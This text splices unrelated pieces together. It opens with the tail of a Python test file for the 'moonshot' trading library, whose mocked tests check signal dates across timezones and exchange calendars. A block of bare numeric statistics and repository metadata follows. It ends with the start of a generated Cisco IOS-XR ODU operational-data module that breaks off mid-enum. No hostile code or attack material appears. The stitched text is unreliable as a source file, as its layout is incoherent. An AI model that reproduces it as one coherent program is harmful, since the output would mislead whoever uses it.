                    "USD",
                    None,
                    None
                ],
                "FI23456": [
                    "America/New_York",
                    "STK",
                    "USD",
                    None,
                    None,
                ]
            },
            index=master_fields
        )
        securities.columns.name = "Sid"
        securities.T.to_csv(f, index=True, header=True)
        f.seek(0)

    # 55K USD account with a 1:1 exchange rate, no open positions or orders.
    def mock_download_account_balances(f, **kwargs):
        balances = pd.DataFrame(dict(Account=["U123"],
                                     NetLiquidation=[55000],
                                     Currency=["USD"]))
        balances.to_csv(f, index=False)
        f.seek(0)

    def mock_download_exchange_rates(f, **kwargs):
        rates = pd.DataFrame(dict(BaseCurrency=["USD"],
                                  QuoteCurrency=["USD"],
                                  Rate=[1.0]))
        rates.to_csv(f, index=False)
        f.seek(0)

    def mock_list_positions(**kwargs):
        return []

    def mock_download_order_statuses(f, **kwargs):
        pass

    def mock_pd_timestamp_now(tz=None):
        # Freeze "now" to 2018-05-02 in the strategy TIMEZONE so the
        # signal date resolves to the 2018-05-02 row.
        if tz == "America/Mexico_City":
            return pd.Timestamp("2018-05-02 10:40:00", tz=tz)
        elif tz:
            # Bug fix: datetime.now() takes ``tz``, not ``tzinfo``; the
            # original raised TypeError whenever this branch was executed.
            return datetime.datetime.now(tz=pytz.timezone(tz))
        else:
            return datetime.datetime.now()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
        with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
            with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
                with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
                    with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
                        with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
                            with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
                                orders = BuyBelow1().trade({"U123": 1.0})

    self.assertSetEqual(
        set(orders.columns),
        {'Sid',
         'Account',
         'Action',
         'OrderRef',
         'TotalQuantity',
         'OrderType',
         'Tif'}
    )
    # Only FI23456 closed below 1 (0.99) on the signal date 2018-05-02.
    self.assertListEqual(
        orders.to_dict(orient="records"),
        [
            {
                'Sid': "FI23456",
                'Account': 'U123',
                'Action': 'BUY',
                'OrderRef': 'buy-below-1',
                # 1.0 allocation * 1.0 weight * 55K / 0.99
                'TotalQuantity': 55556,
                'OrderType': 'MKT',
                'Tif': 'DAY'
            }
        ]
    )
def test_signal_date_from_inferred_timezone(self):
    """
    Tests that the signal date is derived from the inferred timezone.
    """
    class BuyBelow1(Moonshot):
        """
        A basic test strategy that buys below 1.
        """
        CODE = "buy-below-1"

        def prices_to_signals(self, prices):
            signals = prices.loc["Close"] < 1
            return signals.astype(int)

    def mock_get_prices(*args, **kwargs):
        dt_idx = pd.DatetimeIndex(["2018-04-01", "2018-04-02", "2018-04-03"])
        fields = ["Close"]
        idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
        prices = pd.DataFrame(
            {
                # Close per date
                "FI12345": [0.9, 11, 10.50],
                "FI23456": [0.89, 0.99, 8.50],
            },
            index=idx
        )
        return prices

    def mock_download_master_file(f, *args, **kwargs):
        master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
        securities = pd.DataFrame(
            {
                "FI12345": ["America/Mexico_City", "STK", "USD", None, None],
                "FI23456": ["America/Mexico_City", "STK", "USD", None, None],
            },
            index=master_fields
        )
        securities.columns.name = "Sid"
        securities.T.to_csv(f, index=True, header=True)
        f.seek(0)

    def mock_download_account_balances(f, **kwargs):
        balances = pd.DataFrame(dict(Account=["U123"],
                                     NetLiquidation=[55000],
                                     Currency=["USD"]))
        balances.to_csv(f, index=False)
        f.seek(0)

    def mock_download_exchange_rates(f, **kwargs):
        rates = pd.DataFrame(dict(BaseCurrency=["USD"],
                                  QuoteCurrency=["USD"],
                                  Rate=[1.0]))
        rates.to_csv(f, index=False)
        f.seek(0)

    def mock_list_positions(**kwargs):
        return []

    def mock_download_order_statuses(f, **kwargs):
        pass

    def mock_pd_timestamp_now(tz=None):
        # Freeze "now" in the securities' timezone so the expected signal
        # date (2018-04-01) is deterministic
        if tz == "America/Mexico_City":
            return pd.Timestamp("2018-04-01 10:40:00", tz=tz)
        elif tz:
            # BUGFIX: datetime.now() takes the timezone as the `tz`
            # positional argument; the former `tzinfo=` keyword raised
            # TypeError whenever this branch was hit
            return datetime.datetime.now(pytz.timezone(tz))
        else:
            return datetime.datetime.now()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices), \
         patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances), \
         patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates), \
         patch("moonshot.strategies.base.list_positions", new=mock_list_positions), \
         patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses), \
         patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now), \
         patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):

        orders = BuyBelow1().trade({"U123": 1.0})

    self.assertSetEqual(
        set(orders.columns),
        {'Sid',
         'Account',
         'Action',
         'OrderRef',
         'TotalQuantity',
         'OrderType',
         'Tif'}
    )
    self.assertListEqual(
        orders.to_dict(orient="records"),
        [
            {
                'Sid': "FI12345",
                'Account': 'U123',
                'Action': 'BUY',
                'OrderRef': 'buy-below-1',
                # 1.0 allocation * 0.5 weight * 55K / 0.9
                'TotalQuantity': 30556,
                'OrderType': 'MKT',
                'Tif': 'DAY'
            },
            {
                'Sid': "FI23456",
                'Account': 'U123',
                'Action': 'BUY',
                'OrderRef': 'buy-below-1',
                # 1.0 allocation * 0.5 weight * 55K / 0.89
                'TotalQuantity': 30899,
                'OrderType': 'MKT',
                'Tif': 'DAY'
            }
        ]
    )
def test_complain_if_stale_date_and_suggest_CALENDAR(self):
    """
    Tests that the error message suggests setting CALENDAR when the data is stale by a single day.
    """
    class BuyBelow1(Moonshot):
        """
        A basic test strategy that buys below 1.
        """
        CODE = "buy-below-1"

        def prices_to_signals(self, prices):
            signals = prices.loc["Close"] < 1
            return signals.astype(int)

    def mock_get_prices(*args, **kwargs):
        dt_idx = pd.DatetimeIndex(["2018-04-01", "2018-04-02", "2018-04-03"])
        fields = ["Close"]
        idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
        prices = pd.DataFrame(
            {
                # Close per date
                "FI12345": [0.9, 11, 10.50],
                "FI23456": [0.89, 0.99, 8.50],
            },
            index=idx
        )
        return prices

    def mock_download_master_file(f, *args, **kwargs):
        master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
        securities = pd.DataFrame(
            {
                "FI12345": ["America/Mexico_City", "STK", "USD", None, None],
                "FI23456": ["America/Mexico_City", "STK", "USD", None, None],
            },
            index=master_fields
        )
        securities.columns.name = "Sid"
        securities.T.to_csv(f, index=True, header=True)
        f.seek(0)

    def mock_download_account_balances(f, **kwargs):
        balances = pd.DataFrame(dict(Account=["U123"],
                                     NetLiquidation=[55000],
                                     Currency=["USD"]))
        balances.to_csv(f, index=False)
        f.seek(0)

    def mock_download_exchange_rates(f, **kwargs):
        rates = pd.DataFrame(dict(BaseCurrency=["USD"],
                                  QuoteCurrency=["USD"],
                                  Rate=[1.0]))
        rates.to_csv(f, index=False)
        f.seek(0)

    def mock_list_positions(**kwargs):
        return []

    def mock_download_order_statuses(f, **kwargs):
        pass

    def mock_pd_timestamp_now(tz=None):
        # Freeze "now" one day past the max price date so the data looks
        # stale by exactly one day
        if tz == "America/Mexico_City":
            return pd.Timestamp("2018-04-04 10:40:00", tz=tz)
        elif tz:
            # BUGFIX: datetime.now() takes the timezone as the `tz`
            # positional argument; the former `tzinfo=` keyword raised
            # TypeError whenever this branch was hit
            return datetime.datetime.now(pytz.timezone(tz))
        else:
            return datetime.datetime.now()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices), \
         patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances), \
         patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates), \
         patch("moonshot.strategies.base.list_positions", new=mock_list_positions), \
         patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses), \
         patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now), \
         patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):

        with self.assertRaises(MoonshotError) as cm:
            BuyBelow1().trade({"U123": 1.0})

    # BUGFIX: removed a leftover no-op `.format(pd.Timestamp.today(...))`
    # call — the expected message contains no format placeholders, so the
    # call did nothing but obscure the assertion
    self.assertIn((
        "expected signal date 2018-04-04 not found in target weights DataFrame, is "
        "the underlying data up-to-date? (max date is 2018-04-03)"
        " If your strategy trades before the open and 2018-04-04 data "
        "is not expected, try setting CALENDAR = <exchange>"), repr(cm.exception))
@patch("moonshot.strategies.base.list_calendar_statuses")
def test_signal_date_from_calendar_timezone_if_open(self, mock_list_calendar_statuses):
    """
    Tests that the signal date is derived from the CALENDAR timezone, if
    set and the exchange is open.
    """
    class BuyBelow1(Moonshot):
        """
        A basic test strategy that buys below 1.
        """
        CODE = "buy-below-1"
        CALENDAR = "TSEJ"

        def prices_to_signals(self, prices):
            signals = prices.loc["Close"] < 1
            return signals.astype(int)

    def mock_get_prices(*args, **kwargs):
        dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
        fields = ["Close"]
        idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
        prices = pd.DataFrame(
            {
                # Close per date
                "FI12345": [9, 11, 10.50],
                "FI23456": [9.89, 0.99, 8.50],
            },
            index=idx
        )
        return prices

    def mock_download_master_file(f, *args, **kwargs):
        master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
        securities = pd.DataFrame(
            {
                "FI12345": ["America/New_York", "STK", "USD", None, None],
                "FI23456": ["America/New_York", "STK", "USD", None, None],
            },
            index=master_fields
        )
        securities.columns.name = "Sid"
        securities.T.to_csv(f, index=True, header=True)
        f.seek(0)

    def mock_download_account_balances(f, **kwargs):
        balances = pd.DataFrame(dict(Account=["U123"],
                                     NetLiquidation=[55000],
                                     Currency=["USD"]))
        balances.to_csv(f, index=False)
        f.seek(0)

    def mock_download_exchange_rates(f, **kwargs):
        rates = pd.DataFrame(dict(BaseCurrency=["USD"],
                                  QuoteCurrency=["USD"],
                                  Rate=[1.0]))
        rates.to_csv(f, index=False)
        f.seek(0)

    def mock_list_positions(**kwargs):
        return []

    def mock_download_order_statuses(f, **kwargs):
        pass

    def _mock_list_calendar_statuses():
        # Exchange is open, so the signal date should come from the
        # calendar timezone (Japan), not the securities' timezone
        return {
            "TSEJ": {
                "timezone": "Japan",
                "status": "open",
                "since": "2018-05-02T09:00:00",
                "until": "2018-05-02T14:00:00"
            }
        }

    mock_list_calendar_statuses.return_value = _mock_list_calendar_statuses()

    def mock_pd_timestamp_now(tz=None):
        if tz == "Japan":
            return pd.Timestamp("2018-05-02 10:40:00", tz=tz)
        elif tz:
            # BUGFIX: datetime.now() takes the timezone as the `tz`
            # positional argument; the former `tzinfo=` keyword raised
            # TypeError whenever this branch was hit
            return datetime.datetime.now(pytz.timezone(tz))
        else:
            return datetime.datetime.now()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices), \
         patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances), \
         patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates), \
         patch("moonshot.strategies.base.list_positions", new=mock_list_positions), \
         patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses), \
         patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now), \
         patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):

        orders = BuyBelow1().trade({"U123": 1.0})

    self.assertSetEqual(
        set(orders.columns),
        {'Sid',
         'Account',
         'Action',
         'OrderRef',
         'TotalQuantity',
         'OrderType',
         'Tif'}
    )
    self.assertListEqual(
        orders.to_dict(orient="records"),
        [
            {
                'Sid': "FI23456",
                'Account': 'U123',
                'Action': 'BUY',
                'OrderRef': 'buy-below-1',
                # 1.0 allocation * 1.0 weight * 55K / 0.99
                'TotalQuantity': 55556,
                'OrderType': 'MKT',
                'Tif': 'DAY'
            }
        ]
    )
@patch("moonshot.strategies.base.list_calendar_statuses")
def test_signal_date_from_calendar_since_if_closed(self, mock_list_calendar_statuses):
    """
    Tests that the signal date is derived from the CALENDAR "since"
    value, if set and the exchange is closed (i.e. is derived from the
    exchange last open date).
    """
    class BuyBelow1(Moonshot):
        """
        A basic test strategy that buys below 1.
        """
        CODE = "buy-below-1"
        CALENDAR = "TSEJ"

        def prices_to_signals(self, prices):
            signals = prices.loc["Close"] < 1
            return signals.astype(int)

    def mock_get_prices(*args, **kwargs):
        dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
        fields = ["Close"]
        idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
        prices = pd.DataFrame(
            {
                # Close per date
                "FI12345": [9, 11, 0.50],
                "FI23456": [9.89, 0.99, 8.50],
            },
            index=idx
        )
        return prices

    def mock_download_master_file(f, *args, **kwargs):
        master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
        securities = pd.DataFrame(
            {
                "FI12345": ["America/New_York", "STK", "USD", None, None],
                "FI23456": ["America/New_York", "STK", "USD", None, None],
            },
            index=master_fields
        )
        securities.columns.name = "Sid"
        securities.T.to_csv(f, index=True, header=True)
        f.seek(0)

    def mock_download_account_balances(f, **kwargs):
        balances = pd.DataFrame(dict(Account=["U123"],
                                     NetLiquidation=[55000],
                                     Currency=["USD"]))
        balances.to_csv(f, index=False)
        f.seek(0)

    def mock_download_exchange_rates(f, **kwargs):
        rates = pd.DataFrame(dict(BaseCurrency=["USD"],
                                  QuoteCurrency=["USD"],
                                  Rate=[1.0]))
        rates.to_csv(f, index=False)
        f.seek(0)

    def mock_list_positions(**kwargs):
        return []

    def mock_download_order_statuses(f, **kwargs):
        pass

    # First, as a control, pretend the exchange is open; this should
    # raise an error
    def _mock_list_calendar_statuses():
        return {
            "TSEJ": {
                "timezone": "Japan",
                "status": "open",
                "since": "2018-05-04T09:00:00",
                "until": "2018-05-04T14:00:00"
            }
        }

    mock_list_calendar_statuses.return_value = _mock_list_calendar_statuses()

    def mock_pd_timestamp_now(tz=None):
        if tz == "Japan":
            return pd.Timestamp("2018-05-04 08:40:00", tz=tz)
        elif tz:
            # BUGFIX: datetime.now() takes the timezone as the `tz`
            # positional argument; the former `tzinfo=` keyword raised
            # TypeError whenever this branch was hit
            return datetime.datetime.now(pytz.timezone(tz))
        else:
            return datetime.datetime.now()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices), \
         patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances), \
         patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates), \
         patch("moonshot.strategies.base.list_positions", new=mock_list_positions), \
         patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses), \
         patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now), \
         patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):

        with self.assertRaises(MoonshotError) as cm:
            BuyBelow1().trade({"U123": 1.0})

    self.assertIn((
        "expected signal date 2018-05-04 not found in target weights DataFrame, is "
        "the underlying data up-to-date? (max date is 2018-05-03"), repr(cm.exception))

    # Now pretend it's May 4 but the exchange was last open May 3; the
    # signal date should fall back to the calendar "since" date
    def _mock_list_calendar_statuses():
        return {
            "TSEJ": {
                "timezone": "Japan",
                "status": "closed",
                "since": "2018-05-03T14:00:00",
                "until": "2018-05-04T09:00:00"
            }
        }

    mock_list_calendar_statuses.return_value = _mock_list_calendar_statuses()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices), \
         patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances), \
         patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates), \
         patch("moonshot.strategies.base.list_positions", new=mock_list_positions), \
         patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses), \
         patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now), \
         patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):

        orders = BuyBelow1().trade({"U123": 1.0})

    self.assertSetEqual(
        set(orders.columns),
        {'Sid',
         'Account',
         'Action',
         'OrderRef',
         'TotalQuantity',
         'OrderType',
         'Tif'}
    )
    self.assertListEqual(
        orders.to_dict(orient="records"),
        [
            {
                'Sid': "FI12345",
                'Account': 'U123',
                'Action': 'BUY',
                'OrderRef': 'buy-below-1',
                # 1.0 allocation * 1.0 weight * 55K / 0.50
                'TotalQuantity': 110000,
                'OrderType': 'MKT',
                'Tif': 'DAY'
            }
        ]
    )
| 37.096212
| 126
| 0.44055
| 5,418
| 61,691
| 4.864157
| 0.068106
| 0.035516
| 0.063709
| 0.074789
| 0.907832
| 0.898915
| 0.884458
| 0.870722
| 0.86374
| 0.854671
| 0
| 0.062275
| 0.456242
| 61,691
| 1,662
| 127
| 37.118532
| 0.723357
| 0.060495
| 0
| 0.800912
| 0
| 0
| 0.161613
| 0.055489
| 0
| 0
| 0
| 0
| 0.023556
| 1
| 0.072188
| false
| 0.006079
| 0.005319
| 0.008359
| 0.132979
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fd6955a789bf0a2d39beb111bf28898708e9707d
| 476,279
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_controller_odu_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_controller_odu_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_controller_odu_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_controller_odu_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR controller\-odu package operational data.
This module contains definitions
for the following management objects\:
odu\: ODU operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class DpProgrammed(Enum):
    """
    DpProgrammed (Enum Class)

    Dp programmed. Values: dp_not_programmed (0), dp_programmed_success (1),
    end_pt_first_channel_ized (2), end_pt_se_cond_channel_ized (3),
    end_pt_first_cross_connected (4), end_pt_se_cond_cross_connected (5),
    end_pt_first_open_connected (6), end_pt_se_cond_open_connected (7),
    end_pt_first_loop_back_ed (8), end_pt_se_cond_loop_back_ed (9),
    end_pt_odu_type_mismatch (10), xc_not_set (11).
    """

    dp_not_programmed = Enum.YLeaf(0, "dp-not-programmed")
    dp_programmed_success = Enum.YLeaf(1, "dp-programmed-success")
    end_pt_first_channel_ized = Enum.YLeaf(2, "end-pt-first-channel-ized")
    end_pt_se_cond_channel_ized = Enum.YLeaf(3, "end-pt-se-cond-channel-ized")
    end_pt_first_cross_connected = Enum.YLeaf(4, "end-pt-first-cross-connected")
    end_pt_se_cond_cross_connected = Enum.YLeaf(5, "end-pt-se-cond-cross-connected")
    end_pt_first_open_connected = Enum.YLeaf(6, "end-pt-first-open-connected")
    end_pt_se_cond_open_connected = Enum.YLeaf(7, "end-pt-se-cond-open-connected")
    end_pt_first_loop_back_ed = Enum.YLeaf(8, "end-pt-first-loop-back-ed")
    end_pt_se_cond_loop_back_ed = Enum.YLeaf(9, "end-pt-se-cond-loop-back-ed")
    end_pt_odu_type_mismatch = Enum.YLeaf(10, "end-pt-odu-type-mismatch")
    xc_not_set = Enum.YLeaf(11, "xc-not-set")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['DpProgrammed']
class GmplsTtiMode(Enum):
    """
    GmplsTtiMode (Enum Class)

    Gmpls tti mode. Values: gmpls_odu_tti_mode_none (0, Not Set),
    gmpls_odu_tti_mode_sm (1, Section Monitoring), gmpls_odu_tti_mode_pm
    (2, Path Monitoring), gmpls_odu_tti_mode_tcm (3, Tandem Connection
    Monitoring).
    """

    gmpls_odu_tti_mode_none = Enum.YLeaf(0, "gmpls-odu-tti-mode-none")
    gmpls_odu_tti_mode_sm = Enum.YLeaf(1, "gmpls-odu-tti-mode-sm")
    gmpls_odu_tti_mode_pm = Enum.YLeaf(2, "gmpls-odu-tti-mode-pm")
    gmpls_odu_tti_mode_tcm = Enum.YLeaf(3, "gmpls-odu-tti-mode-tcm")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['GmplsTtiMode']
class OduAinsStateEt(Enum):
    """
    OduAinsStateEt (Enum Class)

    Odu ains state et. Values: none (0), active_running (1, Running),
    active_pending (2, Pending).
    """

    none = Enum.YLeaf(0, "none")
    active_running = Enum.YLeaf(1, "active-running")
    active_pending = Enum.YLeaf(2, "active-pending")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduAinsStateEt']
class OduDerState(Enum):
    """
    OduDerState (Enum Class)

    Odu der state. Values: out_of_service (0), in_service (1),
    maintenance (2), ains (3, Automatic In Service).
    """

    out_of_service = Enum.YLeaf(0, "out-of-service")
    in_service = Enum.YLeaf(1, "in-service")
    maintenance = Enum.YLeaf(2, "maintenance")
    ains = Enum.YLeaf(3, "ains")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduDerState']
class OduEtherMapPingEt(Enum):
    """
    OduEtherMapPingEt (Enum Class)

    Odu ether map ping et. Values: none (0), gfp (1, GfpF), amp (2),
    bmp (3), gmp (4), wis (5), gfp_ext (6, GfpF Ext).
    """

    none = Enum.YLeaf(0, "none")
    gfp = Enum.YLeaf(1, "gfp")
    amp = Enum.YLeaf(2, "amp")
    bmp = Enum.YLeaf(3, "bmp")
    gmp = Enum.YLeaf(4, "gmp")
    wis = Enum.YLeaf(5, "wis")
    gfp_ext = Enum.YLeaf(6, "gfp-ext")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduEtherMapPingEt']
class OduFlexTypeEt(Enum):
    """
    OduFlexTypeEt (Enum Class)

    Odu flex type et. Values: na (0), cbr (1, ODU Flex Type CBR),
    gfp_resizable (2, GFP resizable), gfp_fix (3, GFP fix).
    """

    na = Enum.YLeaf(0, "na")
    cbr = Enum.YLeaf(1, "cbr")
    gfp_resizable = Enum.YLeaf(2, "gfp-resizable")
    gfp_fix = Enum.YLeaf(3, "gfp-fix")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduFlexTypeEt']
class OduLoopBackMode(Enum):
    """
    OduLoopBackMode (Enum Class)

    Odu loop back mode. Values: none (1), line (2), internal (4).
    Note: values are 1, 2, 4 (bit-flag-style), not consecutive.
    """

    none = Enum.YLeaf(1, "none")
    line = Enum.YLeaf(2, "line")
    internal = Enum.YLeaf(4, "internal")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduLoopBackMode']
class OduPerMon(Enum):
    """
    OduPerMon (Enum Class)

    Odu per mon. Values: disable (0), enable (1).
    """

    disable = Enum.YLeaf(0, "disable")
    enable = Enum.YLeaf(1, "enable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPerMon']
class OduPmCaEt(Enum):
    """
    OduPmCaEt (Enum Class)

    Odu pm ca et. Values: disable (0), enable (1).
    """

    disable = Enum.YLeaf(0, "disable")
    enable = Enum.YLeaf(1, "enable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPmCaEt']
class OduPmMode(Enum):
    """
    OduPmMode (Enum Class)

    Odu pm mode. Values: nim (0, Non-Intrusive Monitor), oper (1, Operational).
    """

    nim = Enum.YLeaf(0, "nim")
    oper = Enum.YLeaf(1, "oper")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPmMode']
class OduPrbsMode(Enum):
    """
    OduPrbsMode (Enum Class)

    Odu prbs mode. Values: invalid (0), source (1), sink (2),
    source_sink (3, Source Sink).
    """

    invalid = Enum.YLeaf(0, "invalid")
    source = Enum.YLeaf(1, "source")
    sink = Enum.YLeaf(2, "sink")
    source_sink = Enum.YLeaf(3, "source-sink")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPrbsMode']
class OduPrbsPattern(Enum):
    """
    OduPrbsPattern (Enum Class)

    Odu prbs pattern. Values: pn_none (0), pn31 (1), pn23 (2), pn11 (4),
    inverted_pn31 (8), inverted_pn11 (16). Note: bit-flag-style values.
    """

    pn_none = Enum.YLeaf(0, "pn-none")
    pn31 = Enum.YLeaf(1, "pn31")
    pn23 = Enum.YLeaf(2, "pn23")
    pn11 = Enum.YLeaf(4, "pn11")
    inverted_pn31 = Enum.YLeaf(8, "inverted-pn31")
    inverted_pn11 = Enum.YLeaf(16, "inverted-pn11")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPrbsPattern']
class OduPrbsStatus(Enum):
    """
    OduPrbsStatus (Enum Class)

    Odu prbs status. Values: locked (0), unlocked (1), not_applicable (2).
    """

    locked = Enum.YLeaf(0, "locked")
    unlocked = Enum.YLeaf(1, "unlocked")
    not_applicable = Enum.YLeaf(2, "not-applicable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPrbsStatus']
class OduPrbsTest(Enum):
    """
    OduPrbsTest (Enum Class)

    Odu prbs test. Values: disable (0), enable (1).
    """

    disable = Enum.YLeaf(0, "disable")
    enable = Enum.YLeaf(1, "enable")

    @staticmethod
    def _meta_info():
        # Lazy import: metadata tables are only loaded when requested
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['OduPrbsTest']
class OduPtTypeEt(Enum):
    """
    OduPtTypeEt (Enum Class)

    Odu pt type et (OPU payload type). Values: na (0),
    two_asynchronous_cbr_mapping (2), three_bit_synchronous_cbr_mapping (3),
    five_gfp_mapping (5), six_virtual_concatenated_signal (6),
    seven_pcs_codeword_transparent_ethernet_mapping (7),
    nine_gfp_mapping_into_opu2 (9), zero_astm1_mapping_into_opu0 (10),
    zero_bstm4_mapping_into_opu0 (11),
    twenty_odu_multiplex_structure_supporting_odt_ujk (32),
    twenty_one_odu_multiplex_structure_supporting_odt_ujk_and_odt_ukts (33).
    """

    na = Enum.YLeaf(0, "na")
    two_asynchronous_cbr_mapping = Enum.YLeaf(2, "two-asynchronous-cbr-mapping")
    three_bit_synchronous_cbr_mapping = Enum.YLeaf(3, "three-bit-synchronous-cbr-mapping")
    five_gfp_mapping = Enum.YLeaf(5, "five-gfp-mapping")
    six_virtual_concatenated_signal = Enum.YLeaf(6, "six-virtual-concatenated-signal")
    seven_pcs_codeword_transparent_ethernet_mapping = Enum.YLeaf(7, "seven-pcs-codeword-transparent-ethernet-mapping")
    nine_gfp_mapping_into_opu2 = Enum.YLeaf(9, "nine-gfp-mapping-into-opu2")
